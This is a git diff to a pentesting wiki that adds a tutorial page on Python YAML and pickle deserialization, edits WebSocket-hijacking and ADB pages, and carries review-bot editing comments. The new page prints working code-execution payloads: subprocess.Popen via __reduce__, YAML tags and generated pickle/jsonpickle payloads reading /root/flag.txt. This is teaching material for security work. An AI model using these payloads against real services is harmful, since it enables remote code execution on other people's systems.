diff --git a/.gitbook/assets/image (628) (1) (1).png b/.gitbook/assets/image (628) (1) (1).png new file mode 100644 index 00000000..e146bcdd Binary files /dev/null and b/.gitbook/assets/image (628) (1) (1).png differ diff --git a/.gitbook/assets/image (628) (1).png b/.gitbook/assets/image (628) (1).png index e146bcdd..cfef5b39 100644 Binary files a/.gitbook/assets/image (628) (1).png and b/.gitbook/assets/image (628) (1).png differ diff --git a/.gitbook/assets/image (628).png b/.gitbook/assets/image (628).png index cfef5b39..40977981 100644 Binary files a/.gitbook/assets/image (628).png and b/.gitbook/assets/image (628).png differ diff --git a/SUMMARY.md b/SUMMARY.md index 53d3b052..94ae6cbd 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -388,6 +388,7 @@ * [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md) * [Exploiting \_\_VIEWSTATE knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-knowing-the-secret.md) * [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-parameter.md) + * [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md) * [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md) * [Email Header Injection](pentesting-web/email-header-injection.md) * [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md) diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md index 058f4bfc..0643f3cb 100644 --- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md +++ b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md 
@@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...). -![](<../../.gitbook/assets/image (628) (1).png>) +![](<../../.gitbook/assets/image (628) (1) (1).png>) The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md index 8721cdee..52f056f2 100644 --- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md +++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md @@ -83,7 +83,9 @@ An attacker can create a **malicious web page** on their own domain which **esta ### Simple Attack -This attack allows you to make the client connect to websocket server and send some predefined value. +Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. + +Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.: ```markup ``` -Usually this will be useless as what you want is to get the information the real user is sending and the responses. - ### Stealing data from user Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code: 
diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md index 39e1934c..517946d9 100644 --- a/pentesting-web/deserialization/README.md +++ b/pentesting-web/deserialization/README.md @@ -130,6 +130,14 @@ For more information about escaping from **pickle jails** check: [bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/) {% endcontent-ref %} +### Yaml** & **jsonpickle + +The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**: + +{% content-ref url="python-yaml-deserialization.md" %} +[python-yaml-deserialization.md](python-yaml-deserialization.md) +{% endcontent-ref %} + ## NodeJS ### `__proto__` and `prototype` pollution diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md new file mode 100644 index 00000000..ed61b549 --- /dev/null +++ b/pentesting-web/deserialization/python-yaml-deserialization.md 
@@ -0,0 +1,123 @@ +# Python Yaml Deserialization + +## Yaml **Deserialization** + +**Yaml **python libraries is also capable to** serialize python objects** and not just raw data: + +``` +print(yaml.dump(str("lol"))) +lol +... + +print(yaml.dump(tuple("lol"))) +!!python/tuple +- l +- o +- l + +print(yaml.dump(range(1,10))) +!!python/object/apply:builtins.range +- 1 +- 10 +- 1 +``` + +Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins). + +![](<../../.gitbook/assets/image (628).png>) + +**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example: + +```python +import yaml +from yaml import UnsafeLoader, FullLoader, Loader +data = b'!!python/object/apply:builtins.range [1, 10, 1]' + +print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10) +print(yaml.load(data, Loader=Loader)) #range(1, 10) +print(yaml.load_all(data)) # +print(yaml.load_all(data, Loader=Loader)) # +print(yaml.load_all(data, Loader=UnsafeLoader)) # +print(yaml.load_all(data, Loader=FullLoader)) # +print(yaml.unsafe_load(data)) #range(1, 10) +print(yaml.full_load_all(data)) # +print(yaml.unsafe_load_all(data)) # + +#The other ways to load data will through an error as they won't even attempt to +#deserialize the python object +``` + +The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader. 
+ +### Basic Exploit + +Example on how to **execute a sleep**: + +```python +import yaml +from yaml import UnsafeLoader, FullLoader, Loader +data = b'!!python/object/apply:time.sleep [2]' +print(yaml.load(data, Loader=UnsafeLoader)) #Executed +print(yaml.load(data, Loader=Loader)) #Executed +print(yaml.load_all(data)) +print(yaml.load_all(data, Loader=Loader)) +print(yaml.load_all(data, Loader=UnsafeLoader)) +print(yaml.load_all(data, Loader=FullLoader)) +print(yaml.unsafe_load(data)) #Executed +print(yaml.full_load_all(data)) +print(yaml.unsafe_load_all(data)) +``` + +## RCE + +Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml + +```python +import yaml +from yaml import UnsafeLoader, FullLoader, Loader +import subprocess + +class Payload(object): + def __reduce__(self): + return (subprocess.Popen,('ls',)) + +deserialized_data = yaml.dump(Payload()) # serializing data +print(deserialized_data) + +#!!python/object/apply:subprocess.Popen +#- ls + +print(yaml.load(deserialized_data, Loader=UnsafeLoader)) +print(yaml.load(deserialized_data, Loader=Loader)) +print(yaml.unsafe_load(deserialized_data)) +``` + +### Tool to create Payloads + +The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:** + +```bash +python3 peas.py +Enter RCE command :cat /root/flag.txt +Enter operating system of target [linux/windows] . Default is linux :linux +Want to base64 encode payload ? [N/y] : +Enter File location and name to save :/tmp/example +Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All +Done Saving file !!!! 
+ +cat /tmp/example_jspick +{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]} + +cat /tmp/example_pick | base64 -w0 +gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg== + +cat /tmp/example_yaml +!!python/object/apply:subprocess.Popen +- !!python/tuple + - cat + - /root/flag.txt +``` + +## References + +For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) diff --git a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md index e8702cb5..819939ea 100644 --- a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md +++ b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md @@ -92,7 +92,7 @@ There could be another problem, if the **response** to the legit request **conta However, the **HEAD** request **doesn't contain a body** but it usually **contains** the **Content-Length** as if the request was a GET request. Therefore, sending a **HEAD** request **instead of a POST** request you can **read the HEAD Content-Length** bytes of the smuggled request response. -![](<../../.gitbook/assets/image (628).png>) +![](<../../.gitbook/assets/image (628) (1).png>) ### Leaking Internal Headers via Tunneling diff --git a/pentesting/5555-android-debug-bridge.md b/pentesting/5555-android-debug-bridge.md index 580dd5fe..aa3e780b 100644 --- a/pentesting/5555-android-debug-bridge.md +++ b/pentesting/5555-android-debug-bridge.md 
@@ -39,3 +39,7 @@ adb pull "/sdcard/com.package" ``` You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274). + +## Shodan + +* `android debug bridge`
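Review bot: the reference change in gcp-buckets-brute-force-and-privilege-escalation.md (`image (628) (1).png` to `image (628) (1) (1).png`) is consistent with the binary renames at the top of the patch: the new `image (628) (1) (1).png` is added with blob e146bcdd, which was the content of `image (628) (1).png`; that file now carries cfef5b39, which was the content of `image (628).png`; and `image (628).png` receives the new blob 40977981. The request-smuggling page (switched to `image (628) (1).png`) and the new python-yaml page (pointing at `image (628).png`) follow the same chain, so every page still shows the picture it showed before and only the new page gets the new screenshot. The numbered GitBook asset names are why adding one image forces three unrelated pages to change; naming assets after the page that uses them (for example `gcp-bucket-listing.png`) would avoid this churn in later patches.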
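Review bot: in the new paragraph in cross-site-websocket-hijacking-cswsh.md, "a simple XSS establishing the connection" contradicts the hunk's own context line ("An attacker can create a malicious web page on their own domain"): the point of CSWSH is that no XSS is needed, because the browser attaches the victim's cookie to a WebSocket handshake opened from the attacker's origin. Suggest "a page on the attacker's domain that opens the connection and sends READY". Same sentence: drop the stray ".:" at the end and change "his websocket session" to "their websocket session". The ```markup fence that follows shows no content here; if the block is empty in the source, the page needs the actual `new WebSocket(...)` / `ws.send("READY")` snippet the paragraph promises. One caveat sentence is worth adding: the cookie only travels with a cross-site handshake if it is not restricted by SameSite (Chromium-based browsers default cookies without the attribute to Lax), so the attack depends on the cookie attributes as much as on the missing Origin check.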
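Review bot: the new heading in pentesting-web/deserialization/README.md, `### Yaml** & **jsonpickle`, has misplaced bold markers and will render with literal asterisks; `### YAML & jsonpickle` is what was meant. In the paragraph below it, "The following page present the technique to abuse an unsafe deserialization in yamls python libraries and finishes with" should read "The following page presents how to abuse unsafe deserialization in Python YAML libraries and finishes with". ruamel.yaml appears only in the payload-generator sentence although the linked page says the same payload works against it; mentioning it in the first sentence too keeps the summary honest.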
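Review bot: the paragraph after the first loader example in python-yaml-deserialization.md ("in version >= 5.1, it doesn't allow to deserialize any serialized python class or class attribute, with Loader not specified in load() or Loader=SafeLoader") is not accurate. In PyYAML 5.1 through 5.4, `yaml.load(data)` with no Loader emits a YAMLLoadWarning and falls back to FullLoader, and FullLoader in releases before 5.4 still allowed code execution through `!!python/object/new` (CVE-2020-1747, with the incomplete fix tracked as CVE-2020-14343); from PyYAML 6.0 the Loader argument is mandatory and `yaml.load(data)` raises TypeError. Suggest saying that plainly and stating that only SafeLoader (`safe_load`, `safe_load_all`) rejects `!!python/*` tags outright. Two problems in the code blocks: every `load_all`, `full_load_all` and `unsafe_load_all` call returns a lazy generator, so `print(yaml.unsafe_load_all(data))` prints `<generator object ...>` and executes nothing, which makes the "Executed" versus not-executed comparison misleading; wrap those calls in `list(...)` so the reader sees that `unsafe_load_all` also runs the sleep. The first block (the `yaml.dump` examples) is missing `import yaml` and has no `python` tag on its fence while the other blocks do. In the RCE block, the result of `yaml.dump(Payload())` is named `deserialized_data` although it is the serialized payload; `serialized_data` reads right. Finally, the opening sentence (`**Yaml **python libraries is also capable to** serialize python objects**`) and "The previous code used **unsafe\_load **to" have the same misplaced-`**` problem as the README heading, and "is also capable to serialize" should be "are also capable of serializing".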
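Review bot: the new Shodan section in 5555-android-debug-bridge.md lists only the free-text query `android debug bridge`; Shodan matches that against banner text, so combining it with the `port:5555` filter narrows results to the service the page is about. While touching this file, the context line above the hunk reads "the information a references provided", which should be "the information and references provided".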